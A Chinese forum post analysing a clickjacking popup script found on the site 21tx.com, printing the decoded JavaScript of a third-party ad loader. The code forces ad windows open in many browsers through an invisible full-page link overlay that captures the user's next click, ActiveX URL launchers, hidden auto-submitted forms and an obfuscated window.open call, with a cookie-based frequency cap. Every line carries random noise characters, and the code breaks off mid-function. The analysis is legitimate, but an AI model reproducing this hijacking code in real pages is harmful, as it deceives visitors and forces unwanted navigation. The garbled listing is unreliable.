天星网ClickJacking点击劫持分析; x Q2 ?9 y( m( C
http://www.21tx.com/ 天星网 5 l, B# p" U4 Y% |* W' O
我得联系联系作者 2 H$ M% T8 n# e. g" R9 M, W" M1 d
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。1 J- _% z& p: a
http://www.lxting.com/script/popup/v1_min.js+ }7 f3 T2 h" O- X0 F P
$ R& S+ M1 K1 w) w+ O; z
这个是锁定到底JS脚本,
: U# G9 k w( E解密后的代码- (function() {
! C! C; `( S3 h# V - var aa_url = window.ytpp_url;
' M( C: _, N( E1 y; S' A) f- y( Z - var ua = navigator.userAgent; + e o% N% d* c
- var form_div = document.createElement('div'); 1 ~5 A% @3 I: R8 O5 F! x
- var form_pd = 0;
2 W: H2 S7 _: R& t& n - var browser = {
3 b2 L. y6 T/ O: e5 n/ I - ie: /msie/i.test(ua),
; C% X" @, g L. I, o6 u - ie6: /msie 6/i.test(ua), + p0 X1 k( T' x+ m! Q, @8 m
- ie7: /msie 7/i.test(ua),
; ^; G( v" V9 z/ w: Y' x5 O - ie8: /msie 8/i.test(ua), 8 v; k; M* V/ E2 j6 n( X
- ie9: /msie 9/i.test(ua),
0 a4 g; r6 U2 h, B3 S/ Q - 360 : /360se/i.test(ua), . q& v' k( H5 |: Q4 O1 d; U: p
- sogou: /;?se.+?MetaSr/i.test(ua), 0 B+ x, | f: O+ w* }
- maxthon: /Maxthon/i.test(ua),
" E; w" @9 a$ R2 F# t/ a" \) t - tt: /TencentTraveler/i.test(ua), $ R3 T5 `; H: @2 R ^
- ff: /firefox/i.test(ua),
9 o& ]: \0 {! K3 @; K* R1 {8 Q - webkit: /AppleWebKit/i.test(ua), ) I% r8 s5 v2 E/ L! h
- opera: /Opera/i.test(ua),
) t2 R" S" W! P9 m) V9 ~- x - qqbrowser: /QQBrowser/i.test(ua), 3 z1 P7 ^* j% @7 z+ l! ^ p
- cr: /chrome/i.test(ua), & R- G! Y6 A# T/ ~; N6 K- y. F
- gg: window.chrome, 5 I8 S3 o p, B% Z/ ^! W
- theworld: /Theworld/i.test(ua) + H- S" z# {0 a7 d) A
- };
) ~0 Y) i6 E/ t2 l, G - var _setting = ""; ; W c w; |/ e3 D* e# h' x- V
- var _ct = 0;
1 Z2 S( H9 l5 E5 u8 D4 L/ \ - var _le = 0;
3 m% d' S& u! T - var _pd = 1;
" g1 K- b- Y# L/ v. n5 Z - var _pd2 = 0; x3 E8 M4 G$ D7 A4 z2 b
- var _pc = 1; * F6 R. G+ f4 Z( e' u F
- var _pc2 = 1; . D/ a) m6 J' ]+ l
- var _pco = 0; / v- A L& i; j
- var _pta = 0;
: G6 _0 E k7 j, J, D3 x8 A3 k" p - var _ptb = 0; " D- L3 p& v8 F$ \ F
- var _pt2a = 0;
: A/ ?7 a+ y) Z6 U' m - var _pt2b = 0;
# y4 @- t% ?) V" y6 I - var _pt3a = 0; : e2 B+ B/ _) n( j; E% ?
- var _pt3b = 0;
: _1 J) n! P" q7 \! c( E - var _pt4a = 0; 1 X. H8 r0 l# u) g3 O8 Q3 N& g
- var _pt4b = 0;
' w: j# V9 w8 z - var _pt5a = 0; 1 I, D9 d, y# g9 X
- var _pt5b = 0;
0 @. {& E8 l1 [) N4 S' a3 @+ } - var _pt6a = 0;
: F+ G! E4 u4 N; @( |* R2 y - var _pt6b = 0; 3 T+ T% F7 B7 X) }0 O
- var _pt7a = 0; 5 w+ T* H6 Q' O" V- S# h
- var _pt7b = 0;
! D( Y1 k$ h7 A4 {, V7 w - var _pt8a = 0; 2 O/ _- }$ ~1 P2 C3 H* ]
- var _pt8b = 0;
/ L& E2 C$ x* i7 n% w1 e - var _pt9a = 0; , u, {4 J" ^ I4 b$ i" H9 j
- var _pt9b = 0; + B [" |, [2 J2 U. j- m. q4 x
- var _pt10a = 0; 0 U. x4 k. S* b0 |9 s( b$ b
- var _pt10b = 0;
- _* j/ o. J" W8 x - var _po = 0;
' O' |, ]$ i8 x - var _poo = 0;
1 i( y/ n9 @- E$ w# F+ V& ]6 G' P - var ckn, ckt; 7 Q1 ~% B! W4 i. r; v: N, e
- var ads = 0; / j; S1 y+ ]% N5 D! U! u
- function b(w) { + _: {9 i" [% t( x7 |2 G9 V8 P
- var s = w + "=";
+ R) v+ L, v f - var r = "";
8 Y% t2 Z3 b# \% t( ~, V - var o = 0; 9 k- V6 _2 J @' a L! r
- var d = 0;
# E0 |7 t$ v! U, v( l- l" n" e6 C - var p = document.cookie;
3 a( b% X3 }, t - if (document.cookie.length > 0) {
d* j; _5 {5 Q) v% U - o = document.cookie.indexOf(s);
: P, d/ c4 }' o/ `) h - if (o != -1) {
& U W5 V+ M8 _: w, j' h' L* {) V5 G - o += s.length;
8 N+ r3 q' y% q4 j - d = document.cookie.indexOf(";", o); / }8 Y( \3 d: w
- if (d == -1) d = document.cookie.length;
2 L: m* ^- N1 X* V- B - r = unescape(document.cookie.substring(o, d)) # g5 z8 l7 Y5 o- v/ I# n( a5 |6 s& Y
- }
4 B' K' T+ J6 ` - }
# Z) e' F- i' O0 O+ [ - return r 0 E$ B: ~ m6 W/ I; u. p% |, h
- };
" I* w5 j3 v w$ j - function p(w, p, v) {
9 B1 x) U2 v5 t% R W - var t = 30; ' Q- E$ h$ A0 j7 ^- b8 p* C! O
- try { 5 W$ E) B$ l/ c
- t = parseFloat(p) * 1 ) h) W+ n# t {% @9 y; i
- } catch(e) {
D: u4 \; p* o, l/ p0 _! b; G - t = 30
\! r# i* T$ d1 ~9 g$ E2 p - }
" D# j# N" X! z! P0 I9 I$ } - if (isNaN(t)) t = 30; ! P& k- }, s, S/ s: Z* k
- var then = new Date();
! h+ n* [, y1 w9 \; _$ ?' s8 E0 k - then.setTime(then.getTime() + t * 60 * 1000); + s& [$ i, i% Y! P/ q6 }6 l
- document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
4 Y0 o: B y$ V6 W - }; : L) y/ r9 g9 n, F6 l S
- function init() {
( y4 P5 V" j3 R; E - _setting = ytpp_sti;
8 @. t8 d/ Y- F0 q6 I- z - if (getp(_setting, "CT")) {
) I$ f d1 [1 M1 _ ^) Y - _ct = getp(_setting, "CT") 0 B! O }7 g$ @7 f/ U! W% h
- } : s1 P4 j% R' K1 G( z" p+ |* z- G
- if (getp(_setting, "LE")) { % j7 W7 Z3 [( D8 ?& n8 B
- _le = getp(_setting, "LE") " T! {# U( c+ i2 o2 B" z
- } ( O1 e( N! s! F7 o4 F* B: V7 J
- if (getp(_setting, "PD2")) { 9 {8 S5 ?) I) R# [0 Q6 e
- _pd2 = getp(_setting, "PD2")
, o$ A! E* Z$ P! }' @( ^ - } ; j' r7 b" N1 Y: d$ I
- if (getp(_setting, "PC2")) {
U* O9 P7 k( K) L4 m - _pc2 = getp(_setting, "PC2") / A* K9 V$ v' P
- }
$ K# x y2 _5 D7 x- A8 _ - if (getp(_setting, "PCO")) {
4 O) W0 E) u( g - _pco = getp(_setting, "PCO")
6 C+ S8 t+ _, i, Q - } ; V- J6 z% K9 J' d
- for (var i = 1; i <= 10; i++) { + D0 _- o0 ^% J5 y) E. `
- var n = i == 1 ? "": i;
" Y( {$ q" S( ~ - if (getp(_setting, "PT" + n)) {
! ~: ]! [( V1 ? - eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');");
* y( W0 c0 X+ d/ i% y. Y4 r8 x - eval("_pt" + n + "a = _pt" + n + "[0];");
' W4 B9 g% X: l( o [. r0 z% d - eval("_pt" + n + "b = _pt" + n + "[1];")
& E9 w0 Y% U- n- R; y4 K: v - }
2 k7 B$ {0 ?! i5 }% |5 g - } ; E2 w6 k" f6 O5 k
- if (getp(_setting, "PO")) { , c. i8 ^5 s9 F* e/ O
- _po = getp(_setting, "PO") ' V1 z8 `5 r4 O( N7 O- G8 h' y/ y
- }
2 k, W& F# y; o. d - if (getp(_setting, "POO")) { # o3 k/ Z, P3 e: d: R5 d# s
- _poo = getp(_setting, "POO")
/ n+ x: h6 s) H7 {' Y' Z7 h - } - p$ I8 m% G: R- v) \% b1 ~
- if (_pco == 1 || _poo == 1) { 5 j% E8 M5 O h
- if (_poo == 1) { " e* N: y, p2 V! F
- _pco = 0
# i* ^$ n/ D( X- j- |$ ?7 R L - } else {
" ?3 J7 C, k- `* g- j/ _0 d - _poo = 0 1 C0 h% U+ r) O) [0 `
- } & U9 Z* T. z0 W) d/ o1 K% r/ y
- _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0; 0 M) G3 @ x( \" ?% @- d, D
- for (var i = 2; i <= 10; i++) { 9 w+ h5 F% z6 Y' E9 r
- eval("_pt" + i + "a = _pt" + i + "b = 0;") & E- g' Q# h% F3 w. B' M
- }
& b9 {$ ?" Y8 S) I; c+ V4 Q, l - } 2 Z- [% k0 q5 N
- }; % ?0 N4 F: {/ Z0 ]4 b( I; o1 ~
- function getp(s, p) {
" Y) ^+ O* _4 u5 n. d, d - var i = s.indexOf(p + ":");
9 O% i; H" }$ Y% I6 z - if (i >= 0) { / L% r1 n3 L# r8 n
- return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
6 I+ w9 N; o3 B! E' P0 m - }
& ]; X; P! ~$ H- D - }; & i# n6 i2 ^& s" X5 Q3 D+ K
- function event(e, event, func, act) {
; |' v% B: k5 f6 o - if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func); 3 n# O7 @9 C; i$ K
- else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false)
* a- p" b% V2 U$ ~8 E- Y - }
: e4 y/ j9 e; ? s- N4 w - function pop(url, param) { 3 n/ q& q: j7 {: `; ?/ o1 X
- if (!document.body) {
, b3 l% u! t4 q( v; o+ I" H4 M - return setTimeout(function() { 0 e& z) K& P! L, n6 C
- pop(url, param) ) i" |* a% M3 v) m
- }, ; O$ R- v% N8 n" S
- 13) + {: s" F- }2 K! n: K- L5 Y
- } 7 I2 O+ J, q& |$ m9 H1 i
- try {
4 D$ s7 P. o; n& K6 m. z8 u9 J - if (browser['cr'] && browser['gg']) { / i( l) L) R7 t' d* V
- try {
9 a7 ~* ^2 c2 ]2 E* K9 w/ \ - hrefopen(url)
# W4 m0 @3 J* Q3 T! |5 ] - } catch(e) { 3 y, i4 S- F, i4 T; Y
- a_pop(url) 8 d% a; o+ `2 H& f" f
- } , g0 A3 a4 i( i3 z; G2 H
- } else if (browser['webkit'] && browser['maxthon']) {
9 ?$ W) j/ ]( L' T - if (!func(url)) { * L7 |* @( I8 u0 C
- try {
# z+ [4 b4 L% t: b' q - form_pop(url);
( k" F3 W5 P+ M m' n - a_pop(url)
8 C: x3 h) b: y% ^ - } catch(e) {}
. Z* S; o; K: _) C - }
/ K2 H- D. ^0 i f8 ?0 ?# V - } else if (browser['tt']) { " v2 }1 Q+ p$ h0 Q
- try {
5 Y# u7 b4 J# H. d' W0 }3 j% e - object_pop(url) 2 B- h2 r4 T: W* i
- } catch(e) {
! G+ ~( f; X2 U, s& q; K - a_pop(url)
2 H ~( D) N8 U# l9 s5 k3 a - } 4 q3 B+ w3 u1 ~3 ~9 l
- } else if (browser['sogou']) { ' h- d O# p! j+ k6 L) T# a
- if (!func(url)) { - p; Q3 X) d5 \) c w6 M3 N: \
- try { & f2 e5 C- h; e$ @' a5 W' k
- a_pop(url) % C3 g+ x1 `/ a& j
- } catch(e) {}
* J; `$ Z5 l) Y" F# ]+ b5 Y - }
$ m: M, V1 t0 F9 E/ Z - } else if (browser['webkit'] && browser['qqbrowser']) { & D( R; S) n/ @4 l4 j1 O# r
- if (!func(url)) { " h+ r8 M& w' l. L; N) Q
- try { & D& Z5 S8 y. v& S- T
- form_pop(url) 0 E, K9 d e4 \, V: @
- } catch(e) {
- }: n+ h' v# U! Q8 d - click_pop(url) 6 A) E; f" A6 V
- }
3 v/ V, y. r+ f4 m& T4 ] - }
8 X8 K& k0 f* H - } else if (browser['webkit'] || browser['opera']) {
/ Y$ s, E- \- Y7 I - try {
. _( `! a5 R7 x$ }- e( S* R - form_pop(url); $ W* z; s2 L' c& k$ L# @
- a_pop(url) 6 X D5 _& k2 N" Q
- } catch(e) {} . q9 k: |) C0 J, N
- } else if (browser['theworld'] && browser.ie6) {
_ Z4 h7 @; O/ [ - if (!object_pop2(url)) { % m! s' I5 ~2 e+ @7 L) J
- a_pop(url)
6 [1 f+ n% h8 D( F - } & r4 ?# r6 l) Y% i
- } else if (browser['theworld'] && browser.ie8) { b/ Q/ X8 K0 C4 w4 l) f9 B: g
- if (!func(url)) { 0 }1 z: J3 B0 v; h
- try {
0 ?0 W* C0 M3 C; t - object_pop(url)
& u6 l X, E6 ?2 f- m) O - } catch(e) { 7 W5 \7 K v2 i* k
- click_pop(url) ! A: k+ |# i3 m5 V. T6 j' [ C
- }
) h: X/ A. Y% x5 }" Y) y - }
( ]3 C3 h3 N$ j% M - } else if (browser.ie6) { . I& x3 U5 A# Z$ u! c
- if (!func(url)) { : `# i; m' l4 [) J( h, f' M
- object_pop2(url) 0 D! z$ U# |: v# H. U9 T" }
- } ; \+ Y) c* v. O6 ^* g
- } else if (browser.ie8) { e4 S4 `, m# ~' j, s
- if (!func(url)) { ' E e9 T- b2 ]" p# R
- try {
' D0 z7 I, H" u( |( m' M I - object_pop(url) / c& t% v) |; S+ A
- } catch(e) {
0 L! r8 v4 \/ @- D( Q8 O( g: R - document.onclick = function() {
+ ?5 O( E1 ], n$ H t5 j - func(url);
% ^ u7 F% A* n# p2 G - document.onclick = null; ?, f2 n' n: ] Q+ j8 M* S i
- }
; L! p5 t' S0 L$ g) n% m% q# @ - }
( n! K5 ?4 a9 R+ T - }
2 \" W% n9 Z+ R8 F6 k8 c3 { - } else if (browser['ie']) { & W9 k$ v7 n8 U$ N5 p! I
- try {
2 b, S/ n9 |& ]4 f - object_pop(url) a! G# x$ v* O7 m
- } catch(e) { 5 |! V* X5 x! g7 ^
- click_pop(url) ' F6 Z" x3 B$ T4 [+ i- ~
- } : m0 C" P7 \7 _. d1 n! Y
- } else if (browser['ff']) { , t' T0 ~$ U4 I$ o) d1 a' h
- if (!func(url)) { # t, I% a. G' w( W% i
- click_pop(url)
+ q0 v! [+ C6 p6 G2 b - }
& p! ?; q4 T8 W9 W8 L+ R, E - } else { 0 O. G t' ?" ~2 z$ w
- if (!func(url)) { . x' s, |$ a# A, \! F
- click_pop(url) 9 O& V3 S2 u$ |& J0 t0 `( N
- } 0 x& \% M4 x) h& A4 T4 h
- } / i1 d5 F5 k- c
- } catch(e) { : K6 x' Q: ]! a0 R
- if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) {
+ I3 R4 s1 j3 y9 f6 ^ - click_pop(url) . Q7 i& g. U6 e& V8 d
- } else {
( {& ^+ x5 b, |7 U; p P - a_pop(url)
1 H, s, a& j& S; R, C2 T. r - }
+ Q( n, f [7 F |1 p- W5 H* N - }
% t; g( N) D( |' n' Y+ u - }
0 @" ]% M6 E) e+ s& _% i4 E8 u - function object_pop(url, param) {
, C+ R( D, D0 N$ t# q - var object = document.createElement('object'); & ~* @; t! n v C
- object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6');
% o) V% v5 `' `! ~. \& ]) G0 { - object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
. [8 b( g3 g) B! h# T - append(object);
: H; O+ y, Q& G - object.launchURL(url);
" o. r- @$ @9 S# y6 | - ads++; ; Y4 z2 o. b+ X6 Q
- p(ckn, ckt, ads) / P7 k. [( g% B ~; X
- }
1 k4 L4 v4 [" k5 K - function object_pop2(url, param) { 1 F8 c/ ~4 O# u' v: X# e Y
- var object2 = document.createElement('object'); ' _# \& R" r7 u
- object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); # u1 |/ o! B: J2 r
- object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; ) Z! _% s; F/ ]! ^
- append(object2);
. ^7 z7 e! e4 ~8 p - for (var i in object2) { 1 N0 |' n/ n3 T' D$ Y g8 D. K4 o4 Q
- try { (function(o) {})(object2[i])
' d' S3 T; A) a. N - } catch(e) {} . W1 z0 V n/ @ y: o; m
- } 6 ^5 m1 |. S* n; G H
- setTimeout(function() { + M3 w" |% D6 ^; o& x
- object2.DOM.Script.open(url, '_blank', '') ! [* V! M+ h$ L4 S
- },
2 y6 f/ N O: T$ E8 o. m+ d - 500);
& W5 h0 W# p9 ^( I - ads++;
1 d; g/ w. ]" ~& I. g: Q/ X - p(ckn, ckt, ads)
9 F6 Y- b' _% u7 I8 N7 ] - }
6 V- h2 Y3 ?2 `& e% H8 u. J) W. ? - function append(e) {
* ~- Q4 f I4 _ - for (var t in {
6 T1 z1 V' K& m1 {9 r - body: 1
+ m2 H& x8 Y, \1 I/ ~' ]- v+ S - }) {
6 |/ R6 A: F9 u# J - var ele = document.getElementsByTagName(t); & \ O! r6 Y( l6 r# ~1 A2 @& \( q
- for (var i = 0; i < ele.length; i++) {
* R- B; k3 _8 H; S! T. B - ele[i].insertBefore(e, ele[i].firstChild);
1 u5 y! } I" q" c# f - return
! l) d5 f; [" g: i% c - } % R6 ^; X% q8 n; I, s2 }# |, A' }( G
- } , t/ X! y* Y/ H1 M- ~- A2 {: W. F3 G
- } % v* V! v* z8 h2 e
- function hrefopen(url) {
' l& c6 X( c8 R! A - try { % K; F; i9 U; E$ Y+ w) l
- var c = document.createElement("a");
) N# P) A) c$ c0 ^! l9 |: b: G - c.setAttribute("href", url);
) U) m0 ` @9 l" p. C9 E+ @ - c.setAttribute("target", "_blank");
( _) h+ [& N' o( \ - c.setAttribute("style", "display:none;");
* n) q5 X! x. p" B! g - var b = document.createEvent("MouseEvents");
( K {& q a' I$ N - b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
( c+ H3 L% W" T5 j# g0 w( t - c.dispatchEvent(b); , [) }8 P1 }" t9 z- Y
- ads++;
# S0 B; W8 O4 V$ k7 ] - p(ckn, ckt, ads);
/ C: R& o1 h- |- r+ v+ P - return true
" l$ l( j( N, k" L9 H - } catch(q) { 0 Y4 ^+ c% [2 f& X
- return false
* L3 f2 w" m5 c) C- o: @6 ~: y6 p3 t - }
% }. |! h: O& r0 L& H3 p4 B - }
. \* S9 \/ b6 z h' ` - function form_pop(url) {
. q$ o2 |7 S$ j. r$ _7 S7 _ - form_div.setAttribute('id', '__unionsky_push_d_object_box__'); ) Q- U" e2 C5 o# |, G- Z
- form_div.setAttribute('style', 'display:none'); ; w) i6 O) R7 s" v; k) D
- var form = document.createElement('form'); 4 a) k. e* x3 G
- form.setAttribute('action', aa_url);
7 a- j0 L& y; W6 y# a" p - form.setAttribute('method', 'post');
9 R2 e* T" x, y) |: K4 }( {* U7 { - form.setAttribute('name', '__unionsky_push_d_form_box__');
: u( L/ d3 c5 ^ - form.setAttribute('target', '_blank'); 8 e" O( k% X3 o: N7 Z7 [
- form.setAttribute('style', 'display:none');
' l6 G; t1 k1 s - var sinput = document.createElement('input');
2 K4 ?) h. n" ^' x - sinput.setAttribute('style', 'display:none'); K( t. j- y0 a* S8 `
- sinput.setAttribute('type', 'submit');
" r3 K. [% ~& U: }$ _8 o - sinput.setAttribute('id', '_sumit_2app');
5 e& U% ^& P1 U6 O* W - form.appendChild(sinput);
# S* V" z: p/ M - form_div.appendChild(form);
7 C( I9 V6 [+ O \5 E# W0 {- d - append(form_div); Z& X1 J& c8 m" v( U
- var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; : X- ^$ e8 Y, t( G5 ]$ O
- try { 6 L$ c \, y# O+ E) S! w
- document.getElementById("_sumit_2app").click()
) u3 n! e' w- {2 Q) `+ N( _; l - } catch(e) {
; U2 B8 c2 M& N - event(document, 'keyup',
5 [2 H g& E+ E W/ _6 q - function(e) { & ?3 h c. e) G
- if (document.getElementById('__unionsky_push_d_object_box__') == null) {
3 Z: M9 x' {# m* h F( B5 M - return
' ]4 p5 A2 r. h) d* ^9 Z - }; % n/ |6 Y" `1 \
- e = e || window.event;
v5 j6 E3 B1 J' `3 K2 K - e.canceBubble = true; 3 q# e! k* s9 P8 E, E1 d
- event(document, 'keyup', arguments.callee, true); M. ]3 G. l* Y" f# x
- form_pd = 1; " j# Z, y3 W/ e% E
- unionsky_from.submit()
/ J, T. X5 ~' a& I% \4 b, H4 j. y; ~ - })
" B4 _1 Q% ?2 x& A" w2 X - } ) B8 G' k3 V$ L1 f5 V1 j
- };
& d* R8 u8 X, n4 u& f( e - function click_pop(url, param) {
2 c- ~/ |$ ~2 L3 M: `) K - event(document, 'mouseup',
- k( C% u+ W2 R0 q* T# M/ T7 t - function(e) {
) M& Y0 M: s2 a: r& X! m% F% G - e = e || window.event; 3 N5 q4 k( h5 f1 [9 q4 M
- e.canceBubble = true; - Q. A- G( B& B }7 E6 `
- event(document, 'mouseup', arguments.callee, true); . Q3 B8 y$ Y. B" G8 m `4 C: ~
- func(url, param); 2 c/ u" M- L9 B! n! ^$ y
- ads++; 2 S g, _) g/ n% o) v6 p0 m6 @( O9 d0 D
- p(ckn, ckt, ads) 1 F- I `6 v8 h p' J1 `4 f
- })
J8 S" l8 M- w9 o - };
$ r* h f3 W6 L - function a_pop(url) {
- Q3 {5 d! } c" F% g8 V - if (ytpp_plid == 166028) { ! C& M' b. s' O* E- h
- return l7 V" A! [' z4 _# D+ o
- } 6 J2 m. Z) |, E" P1 V. m& y
- if (!document.body) {
: X* \ o3 w! E - return setTimeout(function() { - @/ ~; {- {" ?% p T7 W
- a_pop(url) , z* x6 b2 ?- H; Q% x1 [ Z* @
- },
) W% [& p. F+ e% C8 ~% b0 t - 13) $ N1 ]# n7 p, U! h V. H
- } $ h/ a! j1 \' ?9 L0 \
- var a = document.createElement("a");
7 s9 t+ f8 p. g# l - a.href = url;
: {7 O, c: r1 C! g% H+ V& H - a.target = "_blank"; " ~* E$ L+ Z- W% e
- var div = document.createElement('div');
0 r" d0 n l) |: d, w o3 U2 D - div.style.backgroundColor = '#fff';
" t E" S+ U* ] - a.appendChild(div);
. ?0 I# q4 u6 I3 e: Y1 ?4 A - append(a); 7 v; b8 q! b9 C4 p' V" C$ @) W
- var as = a.style; # _1 p9 i8 i+ s2 P* E& Z
- as.position = "absolute";
/ K- k6 E3 H( q0 Q C% H. I2 o/ g - as.zIndex = '2147483647';
- W5 }/ s" U0 L% _; q# O8 P - as.display = "block"; 5 {/ x( e- \) y
- as.top = "0px";
! O. o; P4 e' u* J8 V - as.left = "0px"; 2 \' o# D& T m
- as.cursor = 'default';
1 q! e2 d; }. T1 B! W; }# `4 o' C - as.opacity = "0"; + Z4 U. ^ W4 k4 M2 Y* w- p
- as.filter = "alpha(opacity:0)";
" y1 f; u5 u! Y( ^3 t7 M - var m = setInterval(function() {
' s! d, M& o% t5 V* ` - if (form_pd == 1) {
3 T% @$ b( O4 B3 p - a.parentNode.removeChild(a); ( M, k' @6 C( ]9 j
- clearInterval(m);
4 I. @9 W* P0 Y8 J) k- m4 M - return
) d( {- z' L4 x, P8 b* S# [ - } 8 z" F' q! B# B, o! n
- a.style.zIndex = '2147483647';
% ]: p, N9 n+ A# q+ h - var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; & V H8 x4 y4 g: ^; w
- a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px'; " i6 {8 }$ ~. p* p1 ?8 X
- div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
: F7 r. h) f( T) I5 r - div.style.height = d.clientHeight + 'px'; h t2 X/ ]' e+ G
- if (browser['ie']) {
% S5 k+ V `2 [$ N. S - try {
0 J7 { o. U& L- Z0 | - var divs = document.body.childNodes; . c. m) B( Y8 l i# L- L
- for (var i = 0; i < divs.length; i++) { 9 Z' O. o5 k p1 a
- if (!divs[i]['style']) {
. H# X6 U4 a/ d: x: @! o% {) B - continue4 ^& u0 |& k! q: i4 [" t
- }
6 V9 t9 N7 f( b# F) z; D7 }, z - var _i = parseInt(divs[i].style.zIndex); {( O+ M7 }3 n4 F
- if (_i && divs[i] != a && _i == 2147483647) { / r/ e9 t+ H ?. ~5 q
- divs[i].style.zIndex = _i - 1
9 q' S% R$ Q+ d, p - }
. L9 }0 |7 t9 z; z" D - }
# C5 F8 L4 R: }- G& Y - a.style.zIndex = '2147483647'
8 L# |/ B1 Q' T% i- x/ n7 f' o' g7 Y - } catch(e) {}
& b$ H2 T& Q6 f5 w - }
. I2 K; o- C- Z# k% R( v# R J - }, " v' n: d- T/ {( B. ~9 f7 w' q/ n7 p! i
- 120); , n* ~6 @' Y+ P8 c
- a.onclick = function(e) { + F4 [; O: b# Z% Y" g4 ]: V
- if (document.getElementById('__unionsky_push_d_object_box__') != null) { ( y2 n# b% ^9 F/ |# C+ f' @ v
- form_div.parentNode.removeChild(form_div)
X+ j2 T+ |1 ^ - } % I2 I( g% t2 q1 k9 a% |9 \
- e = e || window.event; : w& ^; I, v: `
- e.cancelBubble = true; & W5 T" Z: N, X/ _( x; k7 A
- setTimeout(function() { 3 O! X3 }: K$ Y0 _* \" f
- a.parentNode.removeChild(a)
* A, ?$ j- n9 ?0 i - }, + J6 t/ i/ v( S4 t" O: {$ I% M
- 200);
) }* x$ W$ J& X# W1 [7 K% L: Q, f. c - clearInterval(m);
M' F9 x0 I" L! p - ads++; $ M! v6 |! B6 d! D! A+ d3 J; B
- p(ckn, ckt, ads) 6 v! R9 L* x5 o* ]% }
- };
- D% L! D& Z7 o, t' o - event(a, 'mouseup',
. }% J: _( I% X - function(e) { - {6 u8 N& _& B `
- e = e || window.event; . G, Z* j6 n4 p- p5 I# F; U
- e.cancelBubble = true
$ R& E8 M- T; R1 ]7 B# D - })
% L1 O' r0 |5 `0 ^% r. g - }
: J4 T) Z; y! r c - function func(url, param) {
; c' j+ R6 u8 N, M - var f = window[String.fromCharCode(111, 112, 101, 110)]; ! b( |4 N: t1 {
- var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height);
3 t6 r# t$ n5 y O' f% t' L# Y F - if (w) {
8 ~# ]6 I6 i% G+ m+ ?6 n - ads++; 3 T, Y% v6 r7 `' j4 l: G
- p(ckn, ckt, ads) ! g6 d: q, b9 {. @
- }; 6 L V( C' L5 Y- t) O
- return w
" N3 ]4 v* f, K - }
- L0 o. s+ q9 Q* \. e' I - function fstart(url) {
, d4 l$ U# P+ r) h( B - init();
9 [! g5 [8 V( v% P* [5 ^' L - if (_ct >= 0) { ' J% L* s1 w; j- y- {: }
- ckn = "YITIAN_NUM";
( ]: H" |. [+ y! ^; | - ckt = _ct
3 ^) N, h. e0 }% a( g - } else { 5 {7 k( E, ?' l |
- ckn = "YITIAN_ALL";
" j& J7 o8 a, e/ N# m5 }# Y - ckt = Math.abs(_ct)
9 m& s! N3 Z: b) E5 j! ?2 U - }
9 o I! K0 I5 m& k - if (ckt > 0) {
$ h" ^3 X* }, }4 N7 { - if (b(ckn)) {
) w/ g% F/ \! H) b! k - try { ) `0 w7 ] J" }( H( q; x
- ads = parseFloat(b(ckn))
) b0 M* \- W+ M1 i - } catch(q) {}
* w- M8 H. u5 J5 \) I - } * t8 t. ~1 b! H+ f
- } 2 C* @3 U3 M' I' D, b; g6 @
- if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { 1 ]9 D+ x% K9 }: S& @+ D
- return
' m5 L: w/ d- S) o x - } else {
5 k! Y% c C7 l# t' f - if (_le > 0) {
! a+ J. ~+ ]( a" H - setTimeout(go(url), _le * 1000)
/ n* I# e+ E( M9 f: k" e - } else { 8 c5 r4 e: p- C7 S
- go(url)
& Z7 I- u7 I O h2 d - }
& Y% V* ]6 m& Q t - } ' p* A6 A* `. P7 A& S4 t# a# S
- }
7 h/ N4 v4 e* W+ i+ q# ^$ I - function go(url) { & l0 |% ]. s' g& [% e" P- y5 I
- if (_poo == 1) {
8 R; x9 f- A+ K' k: n4 F - try {
7 D7 b5 p. M9 J% T# l - func(url) 2 p" L3 ?" m& q3 C5 c
- } catch(q) {}
$ Z) P. C/ q% c7 ~" ]2 X4 I7 r; o - } else if (_pco == 1) {
, C; W; r p( d - a_pop(url)
$ E" x1 W+ t! F' e - } else { 4 G( ]5 s7 T9 B' m1 v4 j P
- if (_pd == 1) {
2 g: h4 @5 x) [4 ^) I$ ? - setTimeout(function() { }1 Y( V. ]. h* N7 }) S
- pop(url, { 9 r+ D' V5 ]0 E. Z
- a: 1,
) ?: }9 L) {3 d+ @ - b: 2
& x0 E) _/ N2 ^ - })
: _3 K' i3 a L - },
1 Q: l% B" t% e A4 J g - 300) 1 X! C6 v; u: j3 s. R z. g- @
- } 4 l1 ?8 p3 e9 [: ~3 U( J% v
- if (_pd2 > Math.random()) { 9 U) s" i% u" I( F7 W8 \6 Q
- setTimeout(function() { . t& s7 Q8 m3 {5 w# ~9 w A
- pop(url, {
2 z' ~! c; J, d2 d9 w3 M$ F; n - a: 1, 1 _! l( J% k3 d- U
- b: 2
+ ^5 Y) m7 \3 _4 _ - })
2 u; A3 ~4 V8 J6 J. f. y# g8 k' s - },
1 c; f$ a+ k. W! z# F- K - 300) 9 C1 k/ a$ ^' m5 y+ j
- } + z1 i8 ^6 {9 c+ Z' @
- for (var i = 1; i <= 10; i++) {
. ~ h! c4 T# P - var n = i == 1 ? "": i; $ c" y: J" D/ x: f, l1 e+ w; }
- if (eval("_pt" + n + "b") > Math.random()) {
' U( @3 ?; x. {# B5 D - setTimeout(function() { ! k) f3 ~( y* g0 @- @- n
